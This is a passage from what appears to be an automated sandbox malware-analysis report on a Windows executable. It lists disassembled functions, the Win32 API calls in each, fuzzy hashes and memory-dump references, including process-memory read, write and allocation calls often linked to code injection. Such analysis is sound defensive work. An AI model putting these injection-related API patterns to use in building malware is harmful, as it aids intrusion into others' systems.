                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$__itow$_memmove
                                          • String ID:
                                          • API String ID: 2983881199-0
                                          • Opcode ID: 70e85c19a6495e373205f4bd279e5f0fa5534d030310c5ad1323baeb99d6c6b0
                                          • Instruction ID: a3132fab6754bf850ca9afe46114e1e3fd6b3b3bd2add5d37396198c6b209253
                                          • Opcode Fuzzy Hash: 70e85c19a6495e373205f4bd279e5f0fa5534d030310c5ad1323baeb99d6c6b0
                                          • Instruction Fuzzy Hash: BD21F531B00208FFEB10EBA19C89FAE7BACEB88725F044025FD44D72D0D6B09D499791
                                          Function 00975A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindow.USER32(00000000), ref: 00975A6E
                                          • GetForegroundWindow.USER32 ref: 00975A85
                                          • GetDC.USER32(00000000), ref: 00975AC1
                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00975ACD
                                          • ReleaseDC.USER32(00000000,00000003), ref: 00975B08
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$ForegroundPixelRelease
                                          • String ID:
                                          • API String ID: 4156661090-0
                                          • Opcode ID: de3e2b5600636f89ef640efe2804fcf2cebd5b60ad7e55bc93043f4299a0ab0c
                                          • Instruction ID: ae0df9c9e7fad43ff3ae8644fa4f165910e3e8956341e589ada230da8ba14573
                                          • Opcode Fuzzy Hash: de3e2b5600636f89ef640efe2804fcf2cebd5b60ad7e55bc93043f4299a0ab0c
                                          • Instruction Fuzzy Hash: 93219376A00204AFDB14EF65DC98B9ABBE5EF88310F14C579F849D7362DA70AD00DB90
                                          Function 009012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0090134D
                                          • SelectObject.GDI32(?,00000000), ref: 0090135C
                                          • BeginPath.GDI32(?), ref: 00901373
                                          • SelectObject.GDI32(?,00000000), ref: 0090139C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ObjectSelect$BeginCreatePath
                                          • String ID:
                                          • API String ID: 3225163088-0
                                          • Opcode ID: 3ac95fd51ed0c54160048b0c613c82245e1f63c47efb678160cc336631511ee9
                                          • Instruction ID: 76f9c0f3743b3ec1cafe45b1840ae6921e3d658346d951eadb82f364e2847811
                                          • Opcode Fuzzy Hash: 3ac95fd51ed0c54160048b0c613c82245e1f63c47efb678160cc336631511ee9
                                          • Instruction Fuzzy Hash: 1C216A31C28708EFDB10DF25DC18B6A7BA8FB00361F654226F810961F0D771A891EF90
                                          Function 0095BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          • Opcode ID: 8584e354d77dfbc692ee0793e8e2919b357df8c43528a09e8683ba0974ae6b14
                                          • Instruction ID: 969a389f45fec1b0b77ae764ea7a875b3cbc74e8c361189a20db4357e17e5778
                                          • Opcode Fuzzy Hash: 8584e354d77dfbc692ee0793e8e2919b357df8c43528a09e8683ba0974ae6b14
                                          • Instruction Fuzzy Hash: B801B5B16001197BD604AB1AED42FBBB35CDEA1389B144421FD4996346FB54DE2483E4
                                          Function 00964A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00964ABA
                                          • __beginthreadex.LIBCMT ref: 00964AD8
                                          • MessageBoxW.USER32(?,?,?,?), ref: 00964AED
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00964B03
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00964B0A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                          • String ID:
                                          • API String ID: 3824534824-0
                                          • Opcode ID: f1984e9b078462bbeee5565d5f598e6891fe08e0cd2826016fd1eca0b0925817
                                          • Instruction ID: 16504243c24be9b6ccf8d5f2f6c06cbd8f71431a20fb1bfc079202d6c71ed67f
                                          • Opcode Fuzzy Hash: f1984e9b078462bbeee5565d5f598e6891fe08e0cd2826016fd1eca0b0925817
                                          • Instruction Fuzzy Hash: E511E17691C618BBC7009BF8EC08A9F7BACEB45320F154269F825D3390D675994497A0
                                          Function 00958202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0095821E
                                          • GetLastError.KERNEL32(?,00957CE2,?,?,?), ref: 00958228
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00957CE2,?,?,?), ref: 00958237
                                          • HeapAlloc.KERNEL32(00000000,?,00957CE2,?,?,?), ref: 0095823E
                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00958255
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 842720411-0
                                          • Opcode ID: be2c424d94d9d1975c9cc41c5bd89ca80ddeaa4f896027d6b430faa17ea3b5e9
                                          • Instruction ID: d67a97e4d298a66a51eda7a226f3cb0dc9e2932726150f307059753f2ba953c5
                                          • Opcode Fuzzy Hash: be2c424d94d9d1975c9cc41c5bd89ca80ddeaa4f896027d6b430faa17ea3b5e9
                                          • Instruction Fuzzy Hash: EF0162B1218604BFDB108FA6EC58D677F6CFF85795B500529FC19D2220DA318C14DB60
                                          Function 0095710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00957044,80070057,?,?,?,00957455), ref: 00957127
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00957044,80070057,?,?), ref: 00957142
                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00957044,80070057,?,?), ref: 00957150
                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00957044,80070057,?), ref: 00957160
                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00957044,80070057,?,?), ref: 0095716C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                          • String ID:
                                          • API String ID: 3897988419-0
                                          • Opcode ID: c6a035bea431a4cd3fa7e527f0765f30d090e1c64adcd419976dbd49ee98bca9
                                          • Instruction ID: 30b01cf2ab6e47fed17d7bf9086864c7de614c812773cc224c446588d9d76caf
                                          • Opcode Fuzzy Hash: c6a035bea431a4cd3fa7e527f0765f30d090e1c64adcd419976dbd49ee98bca9
                                          • Instruction Fuzzy Hash: 36018472619618BBDB118FA6EC44BAABBADEF44792F140068FD05D2310D731DE449BA0
                                          Function 00965244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00965260
                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0096526E
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00965276
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00965280
                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009652BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                          • String ID:
                                          • API String ID: 2833360925-0
                                          • Opcode ID: 9edf88af9e63dc4b086954fd2e503dae15e5a1a684991b51b793a580344dabf1
                                          • Instruction ID: 3a86a2d9239962f5b193e32670671606ade3e243f8cf6dca5b4eb000b30cd9e5
                                          • Opcode Fuzzy Hash: 9edf88af9e63dc4b086954fd2e503dae15e5a1a684991b51b793a580344dabf1
                                          • Instruction Fuzzy Hash: A6015731D19A2DDBCF00EFE4ECA8AEDBB78BB49711F420456E951F2240CB3455509BA1
                                          Function 0095810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00958121
                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0095812B
                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0095813A
                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00958141
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00958157
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: 46ac935b6ed997d7f4f6fbd67f9508322eed0272f55af13feabe196b15a7372a
                                          • Instruction ID: 3ec4018ef33ff454566e94ddbb25d0e63f6941d0a464b1a8dfd9259ce7d680a7
                                          • Opcode Fuzzy Hash: 46ac935b6ed997d7f4f6fbd67f9508322eed0272f55af13feabe196b15a7372a
                                          • Instruction Fuzzy Hash: 13F0C2B0218704AFEB114FA6EC9CE673BACFF49755B100025F946D2250DB609C05EB60
                                          Function 0095C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 0095C1F7
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0095C20E
                                          • MessageBeep.USER32(00000000), ref: 0095C226
                                          • KillTimer.USER32(?,0000040A), ref: 0095C242
                                          • EndDialog.USER32(?,00000001), ref: 0095C25C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                          • String ID:
                                          • API String ID: 3741023627-0
                                          • Opcode ID: 8acd5e4e85c171983399b2f4085aca909b7dd835749af7f233e75893a7a0826c
                                          • Instruction ID: 6c303caab0fdbaf2bd009ce692d4870009d9b7546df5dda874b9acc8cffd5a87
                                          • Opcode Fuzzy Hash: 8acd5e4e85c171983399b2f4085aca909b7dd835749af7f233e75893a7a0826c
                                          • Instruction Fuzzy Hash: BF01DB70414708AFEB209B51ED5EF96777CFF00706F000669F952E15E0DBF4A9889B50
                                          Function 009013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          • EndPath.GDI32(?), ref: 009013BF
                                          • StrokeAndFillPath.GDI32(?,?,0093B888,00000000,?), ref: 009013DB
                                          • SelectObject.GDI32(?,00000000), ref: 009013EE
                                          • DeleteObject.GDI32 ref: 00901401
                                          • StrokePath.GDI32(?), ref: 0090141C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                          • String ID:
                                          • API String ID: 2625713937-0
                                          • Opcode ID: 137296144ebe2a12e04280ffa4fd6d7e032e352c3c20ef120046e33ec2e702ef
                                          • Instruction ID: afd85e6358e80b06e74087909b5bfd4d5081e82a1d3ac43644e113b75f134a23
                                          • Opcode Fuzzy Hash: 137296144ebe2a12e04280ffa4fd6d7e032e352c3c20ef120046e33ec2e702ef
                                          • Instruction Fuzzy Hash: 6DF0143042CA08EFDB155F26EC5CB583BA8AB01326F198224E429881F1CB3499A5FF10
                                          Function 00912CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00920DB6: std::exception::exception.LIBCMT ref: 00920DEC
                                            • Part of subcall function 00920DB6: __CxxThrowException@8.LIBCMT ref: 00920E01
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                            • Part of subcall function 00907A51: _memmove.LIBCMT ref: 00907AAB
                                          • __swprintf.LIBCMT ref: 00912ECD
                                          Strings
                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00912D66
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                          • API String ID: 1943609520-557222456
                                          • Opcode ID: a310bc88a86bd08e6631f2ecca2c08a63c74e0f02bc5d5df8a8e2f8d584beeeb
                                          • Instruction ID: 5ea9921bdbf6c6fcebb0df9bd23161fd49ae49d33afc4fe20d6cf4f5f4f4c2fb
                                          • Opcode Fuzzy Hash: a310bc88a86bd08e6631f2ecca2c08a63c74e0f02bc5d5df8a8e2f8d584beeeb
                                          • Instruction Fuzzy Hash: 1A915B716083159FCB14EF24D885EAFB7A8EFC6710F01491DF4959B2A2EA20ED85CB52
                                          Function 0096B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00904750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00904743,?,?,009037AE,?), ref: 00904770
                                          • CoInitialize.OLE32(00000000), ref: 0096B9BB
                                          • CoCreateInstance.OLE32(00992D6C,00000000,00000001,00992BDC,?), ref: 0096B9D4
                                          • CoUninitialize.OLE32 ref: 0096B9F1
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                          • String ID: .lnk
                                          • API String ID: 2126378814-24824748
                                          • Opcode ID: 9ecf3fe8327afa5e91372fc0a85fcebe26c3a50f2aa0e3ad4dfc0e953e947666
                                          • Instruction ID: 3f09611151a22edb6a4c8f0a23e86c4e490c58686649dfc50183685c761353a6
                                          • Opcode Fuzzy Hash: 9ecf3fe8327afa5e91372fc0a85fcebe26c3a50f2aa0e3ad4dfc0e953e947666
                                          • Instruction Fuzzy Hash: A7A16D756043059FCB00DF24C494E6AB7E9FF89324F148958F8999B3A2DB31ED85CB91
                                          Function 0092501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                          Download Yara Rule
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 009250AD
                                            • Part of subcall function 009300F0: __87except.LIBCMT ref: 0093012B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ErrorHandling__87except__start
                                          • String ID: pow
                                          • API String ID: 2905807303-2276729525
                                          • Opcode ID: bc589393659b99d306bf8118c5c7d064406b3f874f19eeadb070954ebd227006
                                          • Instruction ID: cf1febe9a00082cf2e4addb9c2c67b62f6908ddb918d897df8bea9f9ae677824
                                          • Opcode Fuzzy Hash: bc589393659b99d306bf8118c5c7d064406b3f874f19eeadb070954ebd227006
                                          • Instruction Fuzzy Hash: 96518B6191C60296DB117768ED2137F2B98DBC0710F208D59E4D9862AEEE38CDD4EF86
                                          Function 00916192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memset$_memmove
                                          • String ID: ERCP
                                          • API String ID: 2532777613-1384759551
                                          • Opcode ID: 9c58146eaf6ae8d36bec6bcc18d782344e3f4ee0bb2bbc618255b5241543e727
                                          • Instruction ID: 4e14594ad80ff8008e77f1e9c08d31567001d6a77b87418efb89b19672f8d3ed
                                          • Opcode Fuzzy Hash: 9c58146eaf6ae8d36bec6bcc18d782344e3f4ee0bb2bbc618255b5241543e727
                                          • Instruction Fuzzy Hash: 2451A071A00709DBDB24CF55C9817EAB7F8EF84314F20496EE95ACB281E774AA85CB40
                                          Function 009597F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 009614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00959296,?,?,00000034,00000800,?,00000034), ref: 009614E6
                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0095983F
                                            • Part of subcall function 00961487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 009614B1
                                            • Part of subcall function 009613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00961409
                                            • Part of subcall function 009613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0095925A,00000034,?,?,00001004,00000000,00000000), ref: 00961419
                                            • Part of subcall function 009613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0095925A,00000034,?,?,00001004,00000000,00000000), ref: 0096142F
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009598AC
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009598F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
